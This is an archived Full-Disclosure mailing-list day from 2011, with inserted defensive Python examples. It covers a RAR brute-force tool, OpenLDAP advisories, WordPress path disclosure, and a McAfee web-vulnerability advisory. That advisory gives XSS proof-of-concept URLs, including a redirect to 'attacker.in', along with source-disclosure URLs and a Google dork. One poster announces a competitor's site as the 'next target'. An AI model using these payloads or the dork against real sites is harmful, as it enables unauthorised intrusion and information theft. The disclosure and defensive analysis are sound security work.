Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker

2011-03-30 Thread Christopher Truncer
Seems like a good tool for when I can just let it run over time on a rar.

Thanks

Chris

On Mar 29, 2011, at 3:12 PM, Nagareshwar Talekar tnagaresh...@gmail.com wrote:

 Hi all,
 
 We have just released a new password recovery tool - RarPasswordUnlocker
 - a FREE tool to recover the password of protected RAR files. It is
 created by Neeraj, who is a leading contributor on SecurityXploded.com.
 
 For more details & download, visit RarPasswordUnlocker:
 http://bit.ly/ft8i5k
 
 
 -- 
 With Regards
 Nagareshwar Talekar
 
 http://SecurityXploded.com
 http://PasswordForensics.com/
 http://NetCertScanner.com
 http://twitter.com/securityxploded
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker

2011-03-30 Thread Nicolai
Read the link ( http://nagareshwar.securityxploded.com/2011/03/30/launched-rar-password-unlocker-by-neeraj/ )

It [the tool] "uses brute force password recovery technique that can help you to
recover not only easy but also complex passwords."

But without any GPU acceleration, it will take forever to brute-force a complex
password.

Use this tool instead: http://www.golubev.com/rargpu.htm


From: Jo Galara [mailto:jogal...@gmail.com]
To: full-disclosure@lists.grok.org.uk
Sent: Tue, 29 Mar 2011 22:13:03 +0200
Subject: Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker

How does it work? Bruteforce?
  
  On 03/29/2011 09:12 PM, Nagareshwar Talekar wrote:
   Hi all,
   
   We have just released a new password recovery tool - RarPasswordUnlocker
   - a FREE tool to recover the password of protected RAR files. It is
   created by Neeraj, who is a leading contributor on SecurityXploded.com.
   
   For more details & download, visit RarPasswordUnlocker:
   http://bit.ly/ft8i5k
   
   
  -- 
  Regards,
  
  Jo Galara
  





Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread John Belushae
Seriously, what the fuck are you thinking, is this a newsletter or something
here?
Choke on your ripped dumbshit product and die.

And please, keep your release update notification bullshit for your mum, OK.

Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker

2011-03-30 Thread Peter Osterberg
That made my morning laugh! =)

Andrew Farmer skrev 2011-03-30 00:22:
 Yes, but... well, JAD does a better job of explaining than I possibly could:

  // Decompiled with JAD: builds a 7z.exe command line as one string and runs it
  Runtime rt = Runtime.getRuntime();

  String str = "7z.exe x ";
  str = str + "\"" + _filepath + "\" ";
  str = str + "-p\"" + pwd + "\" ";
  str = str + "-o\"" + _destpath + "\"";
  str = str + " -y";

  System.out.println(str);

  Process p = rt.exec(str);
  p.waitFor();

  if (p.exitValue() == 0)
  {
      ret = true;
  }

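The decompiled snippet quoted above concatenates the archive path, the candidate password and the output directory into one string and hands it to Runtime.exec(String), which cuts that string into an argv on whitespace without interpreting the quote characters. The following is an added example (my code, not the tool's or Andrew's; the Java behaviour is emulated in Python) showing how a path with a space is mangled by that tokenisation, and the argument-vector form that needs no quoting layer at all. The sample path and password are constructed.

```python
import subprocess
from typing import Callable, List


def build_command_string(filepath: str, pwd: str, destpath: str) -> str:
    """Rebuild the command exactly as the decompiled concatenation does:
    7z.exe x "<file>" -p"<pwd>" -o"<dest>" -y  (one flat string)."""
    return f'7z.exe x "{filepath}" -p"{pwd}" -o"{destpath}" -y'


def tokenize_like_runtime_exec(command: str) -> List[str]:
    """Emulate Java's Runtime.exec(String): the string is split into an argv
    by a whitespace StringTokenizer. Quote characters are not special, so
    they stay glued to the tokens, and any space inside a path or a
    password splits that value into two separate arguments."""
    return command.split()


def build_argv(filepath: str, pwd: str, destpath: str) -> List[str]:
    """Hardened form: one list element per argument (exec(String[]) or
    ProcessBuilder in Java, a list for subprocess here). There is no
    quoting layer, so spaces and quote characters in the inputs reach
    7z.exe verbatim instead of being re-parsed."""
    return ["7z.exe", "x", filepath, f"-p{pwd}", f"-o{destpath}", "-y"]


def extract_archive(filepath: str, pwd: str, destpath: str,
                    runner: Callable[..., subprocess.CompletedProcess] = subprocess.run
                    ) -> bool:
    """Run 7z with the argv form and report success by exit status, as the
    decompiled code does. The runner is injectable so the logic can be
    exercised without 7z installed; the default runs the real binary.
    Unlike the System.out.println in the original, nothing is echoed, so
    candidate passwords do not end up in console output or logs."""
    proc = runner(build_argv(filepath, pwd, destpath),
                  capture_output=True, check=False)
    return proc.returncode == 0


def fake_runner(returncode: int) -> Callable[..., subprocess.CompletedProcess]:
    """Constructed stand-in for subprocess.run used in the demo and tests."""
    def _run(argv: List[str], **_: object) -> subprocess.CompletedProcess:
        return subprocess.CompletedProcess(argv, returncode)
    return _run


if __name__ == "__main__":
    path = r"C:\My Archives\secret.rar"   # constructed sample with a space
    cmd = build_command_string(path, "s3cret", r"C:\out")
    print("flat string :", cmd)
    print("exec(String):", tokenize_like_runtime_exec(cmd))   # path split in two
    print("argv        :", build_argv(path, "s3cret", r"C:\out"))
    print("success?    :", extract_archive(path, "s3cret", r"C:\out",
                                           runner=fake_runner(0)))
```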


[Full-disclosure] nuclear plants reach software quality levels

2011-03-30 Thread Georgi Guninski
quote
The research paper concluded that there was a roughly 10 percent chance that a 
tsunami could test or overrun the defenses of the Fukushima Daiichi nuclear 
power plant within a 50-year span based on the most conservative assumptions.
But Tokyo Electric did nothing to change its safety planning based on that 
study, which was presented at a nuclear engineering conference in Miami in July 
2007.
[1]
/quote

on top of it their measuring devices overflowed:

quote
Those levels may be higher still, but authorities say 1,000 millisieverts is 
the upper limit of their measuring devices. [2]
/quote

[1] http://www.reuters.com/article/2011/03/29/us-japa-nuclear-risks-idUSTRE72S2UA20110329
[2] http://online.wsj.com/article/SB10001424052748704471904576229854179642220.html#



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread YGN Ethical Hacker Group
According to xssed.com, there are two remaining XSS issues:

https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //


You guys know our disclosed issues are very simple and can easily be
found through viewing HTML/JS source code and simple Google Hacking
(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

However, it was criticized as an 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/, according to Network
World News editor Ellen Messmer. Thus, the next target is the Cenzic
web site. Let's see how strong the Kung-Fu of the Cenzic HailStorm scanner
is.


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar (Burma)
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd




On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes pa...@ximen.es wrote:
 FYI

 http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes


 Pablo Ximenes
 http://ximen.es/
 http://twitter.com/pabloximenes




 2011/3/28 Pablo Ximenes pa...@ximen.es:
 blog post about this: http://ximen.es/?p=469

 Please, don't throw stones at me.

 []'s


 Pablo Ximenes
 http://ximen.es/
 http://twitter.com/pabloximenes



 2011/3/27 YGN Ethical Hacker Group li...@yehg.net

 Vulnerabilities in *McAfee.com


 1. VULNERABILITY DESCRIPTION

 - Cross Site Scripting

 http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')

 - Information Disclosure & Internal Hostname:
   http://www.mcafee.com/js/omniture/omniture_profile.js

   ($ ruby host-extract.rb -a http://www.mcafee.com/js/omniture/omniture_profile.js)

 - Information Disclosure & Source Code Disclosure:

   view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
   view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
   view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
   view-source:http://download.mcafee.com/clinic/Includes/common.asp
   view-source:http://download.mcafee.com/updates/upgrade_patches.asp
   view-source:http://download.mcafee.com/updates/common/dat_common.asp
   view-source:http://download.mcafee.com/updates/updates.asp
   view-source:http://download.mcafee.com/updates/superDat.asp
   view-source:http://download.mcafee.com/eval/evaluate2.asp
   view-source:http://download.mcafee.com/common/ssi/conditionals.asp
   view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
   view-source:http://download.mcafee.com/common/ssi/variables.asp
   view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
   view-source:http://download.mcafee.com/common/ssi/errHandler.asp
   view-source:http://download.mcafee.com/common/ssi/common_subs.asp
   view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
   view-source:http://download.mcafee.com/us/bannerAd.asp
   view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp


 2. RECOMMENDATION

 - Fully utilize McAfee Foundstone experts
 - Use outbound monitoring of traffic to detect potential information leakage


 3. VENDOR

 McAfee Inc
 http://www.mcafee.com


 4. DISCLOSURE TIME-LINE

 2011-02-10: reported to vendor
 2011-02-12: vendor replied "we are working to resolve the issue as
 quickly as possible"
 2011-03-27: vulnerability found to be unfixed completely
 2011-03-27: vulnerability disclosed


 5. REFERENCES

 Original Advisory URL:
 http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
 Former Disclosure, 2008:
 http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
 Former Disclosure, 2009:
 http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
 Former Disclosure, 2010:
 http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
 host-extract: http://code.google.com/p/host-extract/
 Demo: http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
 xssed: http://www.xssed.com/search?key=mcafee.com
 Lessons Learned:
 http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach

 #yehg [2011-03-27]





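The advisory's source-disclosure findings were located by searching indexed pages for an unrendered "<% Dim", and its own recommendation is outbound monitoring for leakage. As an added example (my code, not YGN's host-extract and not anything of McAfee's), here is the check an egress monitor or response-inspection hook could run over served HTML bodies to flag ASP code that reached the client unexecuted, including a truncated block with no closing "%>". The sample responses are constructed and contain no real content.

```python
import re
from dataclasses import dataclass
from typing import List

# An ASP-style server block that should have been executed, never served.
# The second alternative catches a "<%" whose "%>" never arrives (truncated leak).
ASP_BLOCK = re.compile(r"<%(?P<body>.*?)%>|<%(?P<tail>.*)\Z", re.DOTALL)

# Classic ASP / VBScript tokens that make the leak more than a stray "<%".
CODE_MARKERS = ("Dim ", "Response.Write", "Request.", "Server.CreateObject",
                "Session(", "Application(", "Set ", "Sub ", "Function ")
# Strings that turn a source leak into a credential leak.
SECRET_MARKERS = ("Password=", "Pwd=", "User ID=", "Provider=", "ConnectionString")


@dataclass
class Finding:
    offset: int        # character offset of "<%" in the response body
    excerpt: str       # first line of the leaked block, trimmed to 80 chars
    has_code: bool     # recognisable ASP/VBScript inside the block
    has_secret: bool   # connection-string / credential markers inside the block


def scan_asp_leak(body: str) -> List[Finding]:
    """Return one Finding per unrendered ASP block in a served response body.
    A browser never legitimately receives "<% ... %>" from an .asp page; if
    this matches on a text/html response, the server returned its source
    instead of executing it (the failure mode the advisory lists)."""
    findings: List[Finding] = []
    for m in ASP_BLOCK.finditer(body):
        code = m.group("body") if m.group("body") is not None else m.group("tail")
        stripped = code.strip()
        first_line = stripped.splitlines()[0].strip() if stripped else ""
        findings.append(Finding(
            offset=m.start(),
            excerpt=first_line[:80],
            has_code=any(k in code for k in CODE_MARKERS),
            has_secret=any(k in code for k in SECRET_MARKERS),
        ))
    return findings


def worst_severity(body: str) -> str:
    """Collapse the findings to one label an egress monitor can alert on."""
    findings = scan_asp_leak(body)
    if not findings:
        return "clean"
    if any(f.has_secret for f in findings):
        return "credential-leak"
    if any(f.has_code for f in findings):
        return "source-leak"
    return "suspicious"


# Constructed sample responses (not real pages).
RENDERED_PAGE = "<html><body><p>Downloads</p><!-- 100% done --></body></html>"
LEAKED_PAGE = (
    "<%@ Language=VBScript %>\n"
    "<% Dim conn\n"
    "Set conn = Server.CreateObject(\"ADODB.Connection\")\n"
    "conn.Open \"Provider=SQLOLEDB;User ID=web;Password=hunter2\" %>\n"
    "<html><body>Hello</body></html>"
)
TRUNCATED_PAGE = "<html><% Dim site\nsite = Request.QueryString(\"s\")"

if __name__ == "__main__":
    for name, page in (("rendered", RENDERED_PAGE), ("leaked", LEAKED_PAGE),
                       ("truncated", TRUNCATED_PAGE)):
        print(name, "->", worst_severity(page))
        for f in scan_asp_leak(page):
            print("    ", f)
```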

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Benji
I'm sure they pjear the xss 4nd w3bbug f1nd1ng sk1llz of the renowned
ethical hacking group YGN!!!111


(Plzdontxssme)

On 3/30/11, YGN Ethical Hacker Group li...@yehg.net wrote:
 According to xssed.com, there are two remaining XSS issues:

 https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
 https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //


 You guys know our disclosed issues are very simple and can easily be
 found through viewing HTML/JS source code and simple Google Hacking
 (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

 However, it was criticized as an 'illegal break-in' by Cenzic's CMO,
 http://www.cenzic.com/company/management/khera/, according to Network
 World News editor Ellen Messmer. Thus, the next target is the Cenzic
 web site. Let's see how strong the Kung-Fu of the Cenzic HailStorm scanner
 is.



[Full-disclosure] [ MDVSA-2011:055 ] openldap

2011-03-30 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2011:055
 http://www.mandriva.com/security/
 ___

 Package : openldap
 Date: March 30, 2011
 Affected: 2009.0, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been identified and fixed in openldap:
 
 chain.c in back-ldap in OpenLDAP 2.4.x before 2.4.24,
 when a master-slave configuration with a chain overlay and
 ppolicy_forward_updates (aka authentication-failure forwarding) is
 used, allows remote authenticated users to bypass external-program
 authentication by sending an invalid password to a slave server
 (CVE-2011-1024).
 
 modrdn.c in slapd in OpenLDAP 2.4.x before 2.4.24 allows remote
 attackers to cause a denial of service (daemon crash) via a relative
 Distinguished Name (DN) modification request (aka MODRDN operation)
 that contains an empty value for the OldDN field (CVE-2011-1081).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1024
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1081
 ___

 Updated Packages:


Re: [Full-disclosure] nuclear plants reach software quality levels

2011-03-30 Thread Peter Osterberg
Interesting...!

Does that mean that there is a 100 percent risk of the same tsunami over
500 years? Is there a cycle? When was the last one? Risk would be a lot
higher than 10 percent if it was, say, 300 years since the last tsunami

Haven't dug at all into it, this is just a very spontaneous thought...

Georgi Guninski skrev 2011-03-30 12:50:
 quote
 The research paper concluded that there was a roughly 10 percent chance that 
 a tsunami could test or overrun the defenses of the Fukushima Daiichi nuclear 
 power plant within a 50-year span based on the most conservative assumptions.
 But Tokyo Electric did nothing to change its safety planning based on that 
 study, which was presented at a nuclear engineering conference in Miami in 
 July 2007.
 [1]
 /quote

 on top of it their measuring devices overflowed:

 quote
 Those levels may be higher still, but authorities say 1,000 millisieverts is 
 the upper limit of their measuring devices. [2]
 /quote

 [1] http://www.reuters.com/article/2011/03/29/us-japa-nuclear-risks-idUSTRE72S2UA20110329
 [2] http://online.wsj.com/article/SB10001424052748704471904576229854179642220.html#


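Working Peter's question through (an added note, not part of his message): if the quoted 10 percent is the chance of at least one such tsunami in any 50-year window, and the hazard is modelled as a constant annual probability p with independent years, the 500-year figure comes from the survival probability, not from multiplying by ten.

$$P_{50} = 1-(1-p)^{50} = 0.10 \;\Rightarrow\; p = 1 - 0.90^{1/50} \approx 2.1\times10^{-3}\ \text{per year},\qquad 1/p \approx 475\ \text{years}$$

$$P_{500} = 1-(1-p)^{500} = 1 - 0.90^{10} \approx 1 - 0.349 = 0.651$$

So the 500-year probability is about 65 percent, not 100, and the model's mean return period is roughly 475 years. Under this constant-hazard (memoryless) assumption the time since the last event does not change p; a 300-year gap would only raise the risk under a cyclic model, which the quoted study is not described as using.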


[Full-disclosure] [ MDVSA-2011:056 ] openldap

2011-03-30 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2011:056
 http://www.mandriva.com/security/
 ___

 Package : openldap
 Date: March 30, 2011
 Affected: 2010.0, 2010.1
 ___

 Problem Description:

 Multiple vulnerabilities have been identified and fixed in openldap:
 
 chain.c in back-ldap in OpenLDAP 2.4.x before 2.4.24,
 when a master-slave configuration with a chain overlay and
 ppolicy_forward_updates (aka authentication-failure forwarding) is
 used, allows remote authenticated users to bypass external-program
 authentication by sending an invalid password to a slave server
 (CVE-2011-1024).
 
 bind.cpp in back-ndb in OpenLDAP 2.4.x before 2.4.24 does not require
 authentication for the root Distinguished Name (DN), which allows
 remote attackers to bypass intended access restrictions via an
 arbitrary password (CVE-2011-1025).
 
 modrdn.c in slapd in OpenLDAP 2.4.x before 2.4.24 allows remote
 attackers to cause a denial of service (daemon crash) via a relative
 Distinguished Name (DN) modification request (aka MODRDN operation)
 that contains an empty value for the OldDN field (CVE-2011-1081).
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1024
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1025
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1081
 ___

 Updated Packages:


Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Benji
However, it was criticized as an 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/, according to Network
World News editor Ellen Messmer. Thus, the next target is the Cenzic
web site. Let's see how strong the Kung-Fu of the Cenzic HailStorm scanner
is.

On Wed, Mar 30, 2011 at 2:57 PM, Cal Leeming c...@foxwhisper.co.uk wrote:

 ?



Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Quentin Ducas
It is still available at http://insectpro.highprofilesite.com/
Free, no donation required.

Quentin


2011/3/30 runlvl run...@gmail.com:
 Insecurity Research is happy to announce the release of version 2.5,
 get it now while it is still hot!

 Insect Pro 2.5 is a penetration security auditing and testing software
 solution designed to allow organizations of all sizes to mitigate,
 monitor and manage the latest security threats and vulnerabilities.

 We’re always working to improve Insect Pro and now the users obtain
 a new feature: A fully automated active web application security
 reconnaissance tool.

 Check it out: http://www.youtube.com/watch?v=ifiyHem7fMA

 We invite you to take a visual tour where you can find screenshots and
 videos, visit us now at http://www.insecurityresearch.com

 There is no fixed price to get a copy, you can obtain the full version
 by making a minimum donation to keep us coding.

 We are really thankful to the community!

 Get it now from: http://www.insecurityresearch.com

 Juan Sacco

 --
 _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.5 was released, stay tuned




Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Cal Leeming
?

On Wed, Mar 30, 2011 at 1:49 PM, Benji m...@b3nji.com wrote:

 I'm sure they pjear the xss 4nd w3bbug f1nd1ng sk1llz of the renowned
 ethical hacking group YGN!!!111


 (Plzdontxssme)

 On 3/30/11, YGN Ethical Hacker Group li...@yehg.net wrote:
  According to xssed.com, there are two remaining XSS issues:
 
  https://kb.mcafee.com/corporate/index?page=content&id=;; alert(1); //
  https://kc.mcafee.com/corporate/index?page=content&id=;; alert(1); //
 
 
  You guys know our disclosed issues are very simple and can easily be
  found through viewing HTML/JS source code and simple Google Hacking
  (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
 
  However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
  http://www.cenzic.com/company/management/khera/,  according to Network
  World News editor - Ellen Messmer.  Thus, the next target is Cenzic
  web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
  is.
 
 
  -
  Best regards,
  YGN Ethical Hacker Group
  Yangon, Myanmar (Burma)
  http://yehg.net
  Our Lab | http://yehg.net/lab
  Our Directory | http://yehg.net/hwd
 
 
 
 
  On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes pa...@ximen.es wrote:
  FYI
 
 
 http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
 
 
  Pablo Ximenes
  http://ximen.es/
  http://twitter.com/pabloximenes
 
 
 
 
  2011/3/28 Pablo Ximenes pa...@ximen.es:
  blog post about this: http://ximen.es/?p=469
 
  Please, don't throw stones at me.
 
  []'s
 
 
  Pablo Ximenes
  http://ximen.es/
  http://twitter.com/pabloximenes
 
 
 
  2011/3/27 YGN Ethical Hacker Group li...@yehg.net
 
  Vulnerabilities in *McAfee.com
 
 
  1. VULNERABILITY DESCRIPTION
 
  - Cross Site Scripting
 
    http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
 
  - Information Disclosure & Internal Hostname:
    http://www.mcafee.com/js/omniture/omniture_profile.js
 
    ($ ruby host-extract.rb -a http://www.mcafee.com/js/omniture/omniture_profile.js)
 
  - Information Disclosure & Source Code Disclosure:
 
    view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
    view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
    view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
    view-source:http://download.mcafee.com/clinic/Includes/common.asp
    view-source:http://download.mcafee.com/updates/upgrade_patches.asp
    view-source:http://download.mcafee.com/updates/common/dat_common.asp
    view-source:http://download.mcafee.com/updates/updates.asp
    view-source:http://download.mcafee.com/updates/superDat.asp
    view-source:http://download.mcafee.com/eval/evaluate2.asp
    view-source:http://download.mcafee.com/common/ssi/conditionals.asp
    view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
    view-source:http://download.mcafee.com/common/ssi/variables.asp
    view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
    view-source:http://download.mcafee.com/common/ssi/errHandler.asp
    view-source:http://download.mcafee.com/common/ssi/common_subs.asp
    view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
    view-source:http://download.mcafee.com/us/bannerAd.asp
    view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
 
 
  2. RECOMMENDATION
 
  - Fully utilize Mcafee FoundStone Experts
  - Use outbound monitoring of traffic to detect potential information
  leakage
 
 
  3. VENDOR
 
  McAfee Inc
  http://www.mcafee.com
 
 
  4. DISCLOSURE TIME-LINE
 
  2011-02-10: reported to vendor
  2011-02-12: vendor replied "we are working to resolve the issue as
  quickly as possible"
  2011-03-27: vulnerability found to be unfixed completely
  2011-03-27: vulnerability disclosed
 
 
  5. REFERENCES
 
  Original Advisory URL:
 
 
 http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
  Former Disclosure, 2008:
  http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
  Former Disclosure, 2009:
 
 
 http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
  Former Disclosure, 2010:
 
 
 http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
  host-extract: http://code.google.com/p/host-extract/
  Demo:
  http://yehg.net/lab/pr0js/training/view/misc/XSSing_McAfee_Secured/
  xssed: http://www.xssed.com/search?key=mcafee.com
  Lessons Learned:
 
 http://blogs.mcafee.com/mcafee-labs/from-xss-to-root-lessons-learned-from-a-security-breach
 
  #yehg [2011-03-27]
 
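The two information leaks the advisory lists, classic ASP source served unrendered (what the `"<% Dim" site:...` dork finds) and hostnames sitting in a public JavaScript file (what host-extract pulls out), can be checked for mechanically once a page body is in hand. The script below is an added example, not YGN's host-extract and not any McAfee code: it flags a body that still contains server-side ASP delimiters with VBScript inside them, extracts hostnames and IPv4 addresses from JavaScript string literals, and marks the ones that look non-public. The sample bodies, the example.com / example.internal names and the 10.x address are constructed for the example; the marker patterns and the INTERNAL_SUFFIXES list are assumptions to tune per target.

```python
import ipaddress
import re

# Added example, not the advisory's tooling. Sample bodies are constructed;
# none of the hostnames below come from the advisory.

# Classic ASP that reached the client unrendered shows server-side delimiters
# with VBScript inside them. These are the same idea as the advisory's Google
# dork, applied to a body you already fetched.
ASP_MARKERS = (
    re.compile(r"<%\s*@?\s*Language\s*=", re.I),
    re.compile(r"<%[^%]*\bDim\b", re.I),
    re.compile(r"<%[^%]*\bResponse\.Write\b", re.I),
    re.compile(r"<%[^%]*\bServer\.CreateObject\b", re.I),
)

# Hosts in JS live inside string literals (or in URLs inside them), so scan
# literals rather than the raw text; that keeps `s.trackingServer` from being
# misread as a hostname.
STRING_LIT = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")
URL_HOST = re.compile(r"//([A-Za-z0-9.-]+)")
IPV4 = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")
FQDN = re.compile(r"(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z][a-z0-9-]+", re.I)
FILE_EXT = {"js", "css", "asp", "aspx", "php", "html", "htm", "png", "gif", "jpg", "swf", "xml"}
# Assumed naming conventions for non-public names; tune per target.
INTERNAL_SUFFIXES = (".local", ".internal", ".corp", ".lan", ".intranet")


def asp_source_leaked(body: str) -> bool:
    """True when the body looks like ASP source rather than its output."""
    return any(p.search(body) for p in ASP_MARKERS)


def _host_from_literal(text: str):
    text = text.strip()
    m = URL_HOST.search(text)
    if m:
        text = m.group(1)
    if IPV4.fullmatch(text):
        return text
    if FQDN.fullmatch(text) and text.rsplit(".", 1)[-1].lower() not in FILE_EXT:
        return text.lower()
    return None


def extract_hosts(body: str) -> list:
    """Hostnames and IPv4 addresses found in string literals, deduplicated."""
    found = set()
    for m in STRING_LIT.finditer(body):
        host = _host_from_literal(m.group(2))
        if host:
            found.add(host)
    return sorted(found)


def looks_internal(host: str) -> bool:
    """Private address space, or a name under an internal-only suffix."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return host.endswith(INTERNAL_SUFFIXES) or ".corp." in host


def audit(url: str, body: str) -> list:
    """Findings as (kind, detail) tuples for one fetched resource."""
    findings = []
    if asp_source_leaked(body):
        findings.append(("asp-source-leak", url))
    for host in extract_hosts(body):
        findings.append(("internal-host" if looks_internal(host) else "host", host))
    return findings


# Constructed sample responses (not real McAfee content).
LEAKED_ASP = """<%@ Language=VBScript %>
<%
Dim partnerCode, strSQL
partnerCode = Request.QueryString("pc")
strSQL = "SELECT code FROM partners WHERE code='" & partnerCode & "'"
Response.Write partnerCode
%>
<html><body>Download center</body></html>
"""
RENDERED_HTML = "<html><body>Download center</body></html>\n"
PROFILE_JS = """var s_account = "prodaccount";
s.trackingServer = "metrics.example.com";
// collector reachable only from the office network
var internalCollector = "omniture-stage01.corp.example.internal";
var fallback = ["10.12.4.21", "https://cdn.example.com/s_code.js"];
"""

if __name__ == "__main__":
    for url, body in (("/leak.asp", LEAKED_ASP), ("/ok.html", RENDERED_HTML), ("/profile.js", PROFILE_JS)):
        for kind, detail in audit(url, body):
            print(f"{url}: {kind} {detail}")
```

Feed it the bodies a crawler already stored for a site and review the "asp-source-leak" and "internal-host" lines by hand; hostname extraction is a heuristic and the suffix list will miss naming schemes it does not know about.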
 
 
 
 
  

Re: [Full-disclosure] HTB22905: Path disclosure in Wordpress

2011-03-30 Thread Christian Sciberras
With regards to the recent Bugtraq advisory on WordPress DFA:

Re: HTB22905: Path disclosure in Wordpress



Ridiculous! I've been talking about this for some time, the actual
list of vulnerable files follows:

wp-admin\admin-functions.php
wp-admin\includes\admin.php
wp-admin\includes\class-ftp-pure.php
wp-admin\includes\class-ftp-sockets.php
wp-admin\includes\class-wp-filesystem-direct.php
wp-admin\includes\class-wp-filesystem-ftpext.php
wp-admin\includes\class-wp-filesystem-ftpsockets.php
wp-admin\includes\class-wp-filesystem-ssh2.php
wp-admin\includes\comment.php
wp-admin\includes\continents-cities.php
wp-admin\includes\file.php
wp-admin\includes\media.php
wp-admin\includes\misc.php
wp-admin\includes\ms.php
wp-admin\includes\nav-menu.php
wp-admin\includes\plugin-install.php
wp-admin\includes\plugin.php
wp-admin\includes\schema.php
wp-admin\includes\template.php
wp-admin\includes\theme-install.php
wp-admin\includes\update.php
wp-admin\includes\upgrade.php
wp-admin\includes\user.php
wp-admin\maint\repair.php
wp-admin\menu-header.php
wp-admin\menu.php
wp-admin\options-head.php
wp-admin\upgrade-functions.php
wp-config.php
wp-content\themes\twentyten\404.php
wp-content\themes\twentyten\archive.php
wp-content\themes\twentyten\attachment.php
wp-content\themes\twentyten\author.php
wp-content\themes\twentyten\category.php
wp-content\themes\twentyten\comments.php
wp-content\themes\twentyten\footer.php
wp-content\themes\twentyten\functions.php
wp-content\themes\twentyten\header.php
wp-content\themes\twentyten\loop.php
wp-content\themes\twentyten\onecolumn-page.php
wp-content\themes\twentyten\page.php
wp-content\themes\twentyten\search.php
wp-content\themes\twentyten\sidebar-footer.php
wp-content\themes\twentyten\sidebar.php
wp-content\themes\twentyten\single.php
wp-content\themes\twentyten\tag.php
wp-includes\Text\Diff\Engine\native.php
wp-includes\Text\Diff\Engine\string.php
wp-includes\Text\Diff\Engine\xdiff.php
wp-includes\Text\Diff\Renderer\inline.php
wp-includes\Text\Diff\Renderer.php
wp-includes\Text\Diff.php
wp-includes\cache.php
wp-includes\canonical.php
wp-includes\class-feed.php
wp-includes\class-simplepie.php
wp-includes\class-snoopy.php
wp-includes\class.wp-scripts.php
wp-includes\class.wp-styles.php
wp-includes\classes.php
wp-includes\comment-template.php
wp-includes\default-embeds.php
wp-includes\default-filters.php
wp-includes\default-widgets.php
